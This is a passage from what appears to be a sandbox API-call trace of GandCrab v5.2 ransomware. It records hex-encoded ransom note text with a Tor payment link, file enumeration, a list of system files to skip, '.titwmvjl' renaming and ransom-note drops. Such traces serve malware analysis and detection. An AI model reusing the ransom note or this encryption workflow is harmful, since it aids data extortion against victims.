77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0073.461] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0073.462] CloseHandle (hObject=0x2c4) returned 1 [0073.462] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.463] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.463] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x12, wMilliseconds=0x309)) [0073.463] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.463] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0073.463] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0073.464] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\d2ca4a09d2ca4deb61a.lock") returned 94 [0073.464] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\systemcertificates\\my\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0073.465] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.465] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.465] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned 70 [0073.466] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*" [0073.466] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x503338 [0073.466] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.466] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0073.466] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.466] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.466] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0073.466] lstrcmpW (lpString1="AppContainerUserCertRead", lpString2=".") returned 1 [0073.466] lstrcmpW (lpString1="AppContainerUserCertRead", lpString2="..") returned 1 [0073.466] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="AppContainerUserCertRead" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\AppContainerUserCertRead") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\AppContainerUserCertRead" [0073.466] lstrlenW (lpString=".titwmvjl") returned 9 [0073.466] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\AppContainerUserCertRead") returned 94 [0073.466] VirtualAlloc (lpAddress=0x0, dwSize=0xfc, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.466] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\AppContainerUserCertRead.titwmvjl") returned 103 [0073.467] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\AppContainerUserCertRead") returned 94 [0073.467] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\AppContainerUserCertRead") returned 94 [0073.467] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\AppContainerUserCertRead") returned 94 [0073.467] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="desktop.ini") returned -1 [0073.467] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="autorun.inf") returned -1 [0073.467] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="ntuser.dat") returned -1 [0073.467] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="iconcache.db") returned -1 [0073.467] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="bootsect.bak") returned -1 [0073.467] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="boot.ini") returned -1 [0073.467] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="ntuser.dat.log") returned -1 [0073.467] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="thumbs.db") returned -1 [0073.467] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0073.467] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0073.467] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="KRAB-DECRYPT.html") returned -1 [0073.467] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="CRAB-DECRYPT.html") returned -1 [0073.467] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="KRAB-DECRYPT.txt") returned -1 [0073.467] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="CRAB-DECRYPT.txt") returned -1 [0073.467] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="ntldr") returned -1 [0073.467] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="NTDETECT.COM") returned -1 [0073.467] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="Bootfont.bin") returned -1 [0073.467] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.467] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0073.467] lstrcmpW (lpString1="Certificates", lpString2=".") returned 1 [0073.467] lstrcmpW (lpString1="Certificates", lpString2="..") returned 1 [0073.468] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="Certificates" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" [0073.468] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\" [0073.468] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0073.468] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.468] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0073.468] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.468] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0073.468] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.469] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0073.469] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.469] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0073.469] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.469] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.469] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\\\TITWMVJL-DECRYPT.txt") returned 104 [0073.469] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0073.470] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x5